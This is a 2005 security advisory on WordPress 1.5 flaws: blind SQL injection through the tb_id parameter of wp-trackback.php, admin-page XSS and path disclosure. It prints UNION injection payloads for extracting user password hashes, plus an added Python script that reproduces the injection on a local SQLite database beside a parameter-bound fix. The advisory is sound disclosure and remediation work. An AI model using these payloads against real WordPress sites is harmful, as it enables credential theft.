wordpress15sql.txt

2005-08-14T00:00:00
ID PACKETSTORM:39288
Type packetstorm
Reporter Thomas Waldegger
Modified 2005-08-14T00:00:00

Description

                                        
---------------------------------------------------  
| BuHa Security-Advisory #1 | May 17th, 2005 |  
---------------------------------------------------  
| Vendor | Wordpress |  
| URL | http://wordpress.org/ |  
| Version | <= Wordpress 1.5 |  
| Risk | Moderate (SQL-Injection) |  
---------------------------------------------------  
  
o Description:  
=============  
  
WordPress is a state-of-the-art semantic personal publishing platform  
with a focus on aesthetics, web standards, and usability.   
  
Visit http://wordpress.org/ for detailed information.  
  
o SQL-Injection:  
===============  
  
The most critical vulnerability in the 1.5 release of WordPress is an  
SQL injection in `wp-trackback.php'. It is a blind injection and so not  
trivially exploitable: a well-formed injected query returns nothing to  
the attacker. It is nevertheless possible to brute-force values from  
the tables, for example the password hashes.  
  
Some details:  
The parameter `tb_id' in `wp-trackback.php' is not validated, and its  
value is placed in the SQL query without quotes, so an attacker can  
append SQL commands to the query:  
  
$pingstatus = $wpdb->get_var("SELECT ping_status FROM $wpdb->posts  
WHERE ID = $tb_id");  
  
Example (the original POST request has been converted into a GET  
request for readability):  
  
> $tb_id = 1 union select 0,user_pass from wp_users  
> $url = bla  
> $title = bla  
  
</wp-trackback.php?tb_id=1%20union%20select%200,user_pass%20from%20wp_users&url=bla&title=bla>  
  
Injecting this query produces the following database error:  
  
> WordPress database error:  
> [The used SELECT statements have a different number of columns]  
> SELECT ping_status FROM wp_posts WHERE ID = 1 union select 0,   
> user_pass from wp_users  
  
When `1 union select user_pass from wp_users' is supplied as the value  
of `tb_id' instead, no error message appears, because the query is now  
well-formed. The presence or absence of that error message is the only  
feedback the attacker gets, but since arbitrary SQL can be appended to  
the query it is still possible to reconstruct values from the tables.  
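  
The following script is an added example and is not part of the original  
advisory or of WordPress itself. It rebuilds the vulnerable query against  
an in-memory SQLite database standing in for MySQL (the table layout, the  
post and the MD5 hash are constructed sample data) and reproduces the two  
observable outcomes described above: a database error for the union with  
the wrong column count, and no error for the well-formed union, which  
nonetheless hands the hash back to the application even though the  
application never displays it. Next to it is a hardened version that  
requires `tb_id' to be an integer and binds it as a query parameter; that  
remediation is an assumption for the example, not text quoted from the  
1.5.1 release.  

```python
import sqlite3

# Constructed sample schema and data standing in for the WordPress 1.5
# tables named in the advisory (wp_posts, wp_users). Assumption: user_pass
# holds MD5("password"), the format WordPress 1.5 used for password hashes.
SCHEMA = """
CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, ping_status TEXT);
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO wp_posts VALUES (1, 'Hello world!', 'open');
INSERT INTO wp_users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def connect():
    """Fresh in-memory database loaded with the constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_ping_status(db, tb_id):
    """The advisory's query shape: tb_id is interpolated into the SQL
    string unquoted and unvalidated, so everything after the number
    becomes part of the statement."""
    sql = f"SELECT ping_status FROM wp_posts WHERE ID = {tb_id}"
    return db.execute(sql).fetchall()


def probe(db, tb_id):
    """What an attacker can observe for a given tb_id value:
    ('error', message) when the database rejects the query, otherwise
    ('ok', rows). The rows are what the database returns; WordPress only
    reads a single value ($wpdb->get_var) and never echoes the result,
    which is why the injection is blind."""
    try:
        rows = vulnerable_ping_status(db, tb_id)
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    return ("ok", rows)


def fixed_ping_status(db, tb_id):
    """Hardened query (assumed remediation, not quoted from 1.5.1): tb_id
    must parse as an integer and is bound as a parameter, so its value can
    never be interpreted as SQL."""
    try:
        post_id = int(tb_id)
    except (TypeError, ValueError):
        raise ValueError("tb_id must be an integer")
    return db.execute(
        "SELECT ping_status FROM wp_posts WHERE ID = ?", (post_id,)
    ).fetchall()


def fixed_probe(db, tb_id):
    """Same observation as probe(), but against the hardened query."""
    try:
        rows = fixed_ping_status(db, tb_id)
    except ValueError as exc:
        return ("rejected", str(exc))
    return ("ok", rows)


if __name__ == "__main__":
    db = connect()
    payloads = [
        "1",                                          # normal request
        "1 union select 0,user_pass from wp_users",   # wrong column count
        "1 union select user_pass from wp_users",     # well-formed union
    ]
    for p in payloads:
        print(f"vulnerable tb_id={p!r} -> {probe(db, p)}")
        print(f"fixed      tb_id={p!r} -> {fixed_probe(db, p)}")
```

SQLite's error text differs from the MySQL message quoted in the advisory,  
but the observable the attacker relies on is the same: the mismatched  
union fails, the well-formed one does not.  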
  
o XSS:  
=====  
  
</wp-admin/edit.php?s=[XSS]&submit=Search>  
</wp-admin/post.php?action=confirmdeletecomment&comment=1&p=[XSS]>  
  
o Path Disclosure:  
=================  
  
</wordpress-1.5-strayhorn/wp-content/themes/*>  
</wordpress-1.5-strayhorn/wp-includes/*>  
</wordpress-1.5-strayhorn/wp-admin/*>  
  
> Fatal error: Call to undefined function add_filter() in  
> [...]/htdocs/testenv/blogs/wordpress/wordpress-1.5-strayhorn/  
> wp-content/themes/classic/comments-popup.php on line 3  
  
o Disclosure Timeline:  
=====================  
  
17 Apr 05 - Security flaws discovered.  
19 Apr 05 - Vendor contacted.  
10 May 05 - Vendor released bugfixed version.  
17 May 05 - Public release.  
  
o Solution:  
==========  
  
Upgrade to wordpress 1.5.1 [1]  
  
o Credits:  
=========  
  
Thomas Waldegger <bugtraq@morph3us.org>  
BuHa-Security Community - http://buha.info/board/  
  
[1] http://wordpress.org/development/2005/05/one-five-one/  